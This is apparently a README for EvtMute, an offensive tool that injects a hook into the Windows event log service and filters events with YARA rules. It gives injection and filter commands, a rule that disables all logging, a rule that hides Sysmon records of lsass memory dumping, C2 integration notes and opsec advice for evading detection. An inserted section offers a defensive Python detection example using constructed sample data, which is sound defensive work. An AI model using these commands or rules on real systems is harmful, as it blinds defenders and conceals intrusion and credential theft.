EvtMute – Apply A Filter To The Events Being Reported By Windows Event Logging

This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by Windows event logging.

Usage

Grab the latest version from here. EvtMuteHook.dll contains the core functionality; once it is injected it applies a temporary filter that allows all events to be reported, and this filter can be updated dynamically without having to reinject. I have written SharpEvtMute.exe, a C# assembly that can easily be run via execute in shad0w or execute-assembly in Cobalt Strike. I will be creating a native version in C for much better integration with shad0w.

Disabling Logging

A trivial use case would be to disable event logging system wide. To do this we can use the following YARA rule.

rule disable { condition: true }

We will need to start by injecting the hook into the event service.

.\SharpEvtMute.exe --Inject

Now that the hook is in place we can add the filter.

.\SharpEvtMute.exe --Filter "rule disable { condition: true }"

Now all events will be dropped by the event service.

Complex Filters

Filters can be changed dynamically without having to reinject a hook. This makes it quick and easy to update the active filter.

An example of a more complex filter would be this. It is capable of blocking the events associated with an lsass memory dump from being reported by Sysmon.

rule block_lsass_dump
{
    meta:
        author = "@_batsec_"
        description = "Stop lsass dumping being reported by sysmon"

    strings:
        $provider = "Microsoft-Windows-Sysmon"
        $image = "lsass.exe" nocase
        $access = "GrantedAccess"
        $type = "0x1fffff"

    condition:
        all of them
}

With a complex rule like this it is much harder to condense it into a single line. This is why I added the ability to supply base64 encoded rules.

The rule can easily be converted to base64 from a Linux command line.

base64 -w 0 YaraFilters/lsassdump.yar | echo $(</dev/stdin)

Then, using the --Encoded flag, we can pass the encoded string as a filter.

Opsec Considerations

When injecting the hook SharpEvtMute.exe will call CreateRemoteThread and this call is made before the hook is placed so it will be reported by Sysmon. This is because the injection feature of SharpEvtMute.exe should only be used as a PoC. I recommend manually injecting EvtMuteHook.dll into the event logging service when stealth is important.

Its PID can be found by running SharpEvtMute.exe --Pid. The hook can be placed by manually injecting the shellcode (run make in EvtMuteBin) via your C2 framework of choice, e.g. shinject in shad0w.

It is also worth mentioning that the hook uses a named pipe to update filters. The named pipe is called EvtMuteHook_Rule_Pipe (this name can be changed easily). There is a rule baked into the hook to ensure that any events containing this name are dropped automatically, but having it listening is still an IOC, so I recommend changing it.
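
The three facts above are exactly what a defender has to work with: the CreateRemoteThread into the event service happens before the hook exists and so is still recorded by Sysmon, the default pipe name is an IOC that can be read straight from the named-pipe namespace (the hook drops any event mentioning it, so the event log itself will not show it), and a `condition: true` filter makes every channel go silent. The following Python is an added detection example, not part of EvtMute or its author's code; the Sysmon-style records, the PID of the service host and the pipe listing are all constructed sample data, and the idea that the EventLog host PID comes from a service inventory such as `tasklist /svc` is an assumption about the defender's environment.

```python
"""Detection checks for an EvtMute-style event log hook (added example, not
part of the EvtMute project). Three signals, all taken from the README text:

  1. SharpEvtMute.exe --Inject calls CreateRemoteThread into the event log
     service before the hook is placed, so Sysmon still records it (EID 8).
  2. The hook listens on a named pipe (default EvtMuteHook_Rule_Pipe) and drops
     any event mentioning that name, so the check has to come from a direct
     listing of the named-pipe namespace rather than from the event log.
  3. With `rule disable { condition: true }` active the event service drops
     everything, so channels that normally chatter simply stop.

Every record below is CONSTRUCTED sample data shaped like Sysmon EventData;
the PIDs, paths and pipe listing are invented for the example.
"""
from datetime import datetime, timedelta

DEFAULT_PIPE_NAME = "EvtMuteHook_Rule_Pipe"  # README default; operators are told to rename it

T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    {"time": T0, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 1,
     "data": {"Image": "C:\\Windows\\System32\\notepad.exe"}},
    {"time": T0 + timedelta(minutes=1), "channel": "Security", "event_id": 4624, "data": {}},
    {"time": T0 + timedelta(minutes=2), "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 8,
     "data": {"SourceImage": "C:\\Users\\alice\\SharpEvtMute.exe",
              "TargetImage": "C:\\Windows\\System32\\svchost.exe",
              "TargetProcessId": "1234"}},
    # Nothing is recorded after this point: the hook now drops every event.
]
# Constructed: PID of the svchost.exe instance hosting the EventLog service, as
# a defender would learn it from `tasklist /svc` or a service inventory (assumption).
EVENTLOG_PIDS = {1234}
# Constructed: a snapshot of names under \\.\pipe\ on the host.
PIPE_LISTING = ["InitShutdown", "lsass", "srvsvc", "EvtMuteHook_Rule_Pipe"]
NOW = T0 + timedelta(minutes=30)


def detect_remote_thread_into_eventlog(events, eventlog_pids):
    """Sysmon EID 8 records whose target PID hosts the EventLog service."""
    return [ev for ev in events
            if ev["event_id"] == 8
            and int(ev["data"].get("TargetProcessId", -1)) in eventlog_pids]


def find_filter_pipe(pipe_listing, pipe_name=DEFAULT_PIPE_NAME):
    """Names from a direct pipe listing that contain the hook's pipe name."""
    return [name for name in pipe_listing if pipe_name.lower() in name.lower()]


def detect_silent_channels(events, now, max_gap):
    """Channels whose newest event is older than max_gap; maps channel -> gap."""
    last_seen = {}
    for ev in events:
        ch = ev["channel"]
        if ch not in last_seen or ev["time"] > last_seen[ch]:
            last_seen[ch] = ev["time"]
    return {ch: now - seen for ch, seen in last_seen.items() if now - seen > max_gap}


def run_detections(events, eventlog_pids, pipe_listing, now, max_gap=timedelta(minutes=10)):
    """Bundle the three checks into one alert summary (gaps reported in minutes)."""
    return {
        "remote_thread_into_eventlog": [
            (ev["time"].isoformat(), ev["data"]["SourceImage"])
            for ev in detect_remote_thread_into_eventlog(events, eventlog_pids)],
        "hook_pipe_present": find_filter_pipe(pipe_listing),
        "silent_channels": {ch: int(gap.total_seconds() // 60)
                            for ch, gap in detect_silent_channels(events, now, max_gap).items()},
    }


if __name__ == "__main__":
    for name, hits in run_detections(SAMPLE_EVENTS, EVENTLOG_PIDS, PIPE_LISTING, NOW).items():
        print(f"{name}: {hits}")
```

The silence check is the one that survives a renamed pipe and a manual injection: whatever the filter looks like, a muted host stops producing the routine Security and Sysmon events it produced before, and a collector that tracks the last-seen time per channel per host sees that gap. Tune `max_gap` to the normal cadence of each channel rather than using one global value.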

Community Filters

If you create some useful filters feel free to make a pull request to the YaraFilters directory. It would be cool to have a good collection of filters to hide common actions that everyone can benefit from.
